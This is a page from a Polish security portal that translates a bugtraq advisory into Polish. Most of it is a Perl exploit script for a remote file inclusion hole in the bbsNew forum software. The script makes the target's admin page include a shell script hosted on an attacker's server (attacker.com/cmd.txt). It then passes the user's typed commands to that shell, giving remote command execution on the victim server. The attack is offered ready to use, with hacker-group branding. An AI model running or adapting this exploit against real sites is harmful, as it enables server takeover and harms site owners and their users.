Newsy|Artykuły|Projekty|Dodaj newsa|Dodaj na bugtraq|Rejestracja|Archiwum|Forum
ccmenu.gif

Newsy
Artykuły
Security
Hacking
Kernel Hacking
Programowanie
Linux
Wywiady
Projekty
Wargame
HackMe II
Bugtraq
HackMe
CrackMe
Koszulki
Dodaj newsa
Dodaj na bugtraq
Rejestracja
Archiwum
Forum
Kontakt

cclastnews.gif

Nowe artykuły w dzia...
( 2010-05-08 )
Dane pijanych kierow...
( 2009-12-29 )
7 najczęściej exploi...
( 2009-12-12 )
Cisco 2009 Annual Se...
( 2009-12-10 )
Naukowcy zapowiadają...
( 2009-12-08 )

cctoparts.gif

czytań: [39697]
Kompedium - Skanowanie
czytań: [24054]
Programowanie Raw So...
czytań: [22852]
LIDS - Opis + Konfig...
czytań: [20123]
Dziurawe exploity
czytań: [19798]
Bezpieczeństwo Slack...

ccbugtraq.gif

czytań: [120]
PsychoStats kilka FPD
czytań: [4940]
SQL na http://dobrepro...
czytań: [6473]
phpBB by przemo, kilka...
czytań: [4371]
Livebox Router Buffer ...
czytań: [8917]
phpBB by Przemo XSS / ...

cchackme.gif

czytań: [9349]
HackMe 2
czytań: [9723]
Hackme 1

Polskie tłumaczenie bugtraqu


Przetłumaczył:kiero
Temat artykułu:bbsNew => 2.0.1 Exploit na podatność zdalnego włączania zawartości pliku
Źródło:http://www.securityfocus.com/archive/1/450027/30/0/threaded
Podatne wersje:=> 2.0.1
Data publikacji:2006-10-30 20:54:45
Czytano:1609 razy


#!/usr/bin/perl

#################################################################
# #
# bbsNew #
# #
# Rodzaj: Podatność zdalnego włączania zawartości pliku #
# #
# Odkryte przez : Root3r_H3LL = |)\0073|)\_|-|311 #
# #
# Oryginalne ogłoszenie : http://Www.PersainFox.coM #
# #
# Zdalny: Tak #
# #
# Ryzyko: wysokie #
# #
# #
#################################################################

use IO::Socket;
use LWP::Simple;

$cmdshell="http://attacker.com/cmd.txt"; # <====== Zmien tą linię z twoim osobistym skryptem

print "\n";
print "#################################################################\n";
print "# #\n";
print "# bbsNew => 2.0.1 Remote File Include Vulnerability #\n";
print "# Bug found By : PerSianFox Security #\n";
print "# Email: Root3r_H3LL Root3r_ir[at]yahoo.com #\n";
print "# Web Site : Www.PerSianFox.coM #\n";
print "# We ArE :Root3r_H3LL,Arashrj #\n";
print "# #\n";
print "# pirv8 pirv8 pirv8 #\n";
print "# </\/\\/_ 10\/3 15 1|)\4/\/ #\n";
print "# #\n";
print "#################################################################\n";

if (@ARGV < 2)
{
print "\n Usage: Root3r.pl [host] [path] ";
print "\n EX : Root3r.pl www.victim.com /[path]/ \n\n";
exit;
}

$host=$ARGV[0];
$path=$ARGV[1];

print "Type Your Commands ( uname -a )\n";
print "For Exiit Type END\n";

print "<Shell> ";$cmd = <STDIN>;

while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";

print $socket "GET ".$path."/admin/index2.php?right=".$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";

while ($raspuns = <$socket>)
{
print $raspuns;
}

print "<Shell> ";
$cmd = <STDIN>;
}
ccpanel.gif

Login:
Hasło:

Zapomniałem hasła !


ccsearch.gif

Wpisz słowo:






cclastarts.gif

Linux - race conditi...
( 2010-05-08 )
Własny bootloader w ...
( 2010-05-08 )
Local root buffer ov...
( 2010-05-08 )
Wyrażenia regularne ...
( 2006-09-04 )
Obsługa sygnałów w C...
( 2006-08-05 )

ccstats.gif

Odwiedzin: 7207765
Aktualnie: 11

ccreklama.gif


hosting

Copyrights 2002 - 2009 © CC-Team.org design by fre3ke. Hosted by Net1.pl